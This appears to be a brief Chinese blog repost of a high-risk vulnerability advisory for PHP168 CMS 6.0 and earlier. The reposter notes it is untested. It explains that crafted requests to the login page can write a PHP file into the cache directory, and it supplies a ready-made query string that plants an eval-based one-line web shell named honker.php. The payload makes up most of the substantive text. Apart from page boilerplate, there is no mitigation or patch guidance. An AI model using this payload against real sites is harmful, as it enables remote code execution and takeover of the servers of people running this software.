PHP168 6.0及以下版本漏洞
|
# 鬼仔:未测试。最近比较忙,所以很多东西都更新不及时,也有好多没贴上来,抱歉,这几天整理下,把积攒的都更新了。
来源:chinesehonker 危险等级:高 影响版本:PHP168 6.0以下版本 入侵者可以在用户登陆页面构造特殊语句,将PHP一句话写入cache目录,从而获得使用PHP168整站程序网站的WEBSHELL权限。 测试语句: ?makehtml=1&chdb[htmlname]=honker.php&chdb[path]=cache&content=?php%20@eval($_POST[honker]);? |
PHP168 6.0及以下版本漏洞
最新推荐文章于 2024-05-09 18:45:00 发布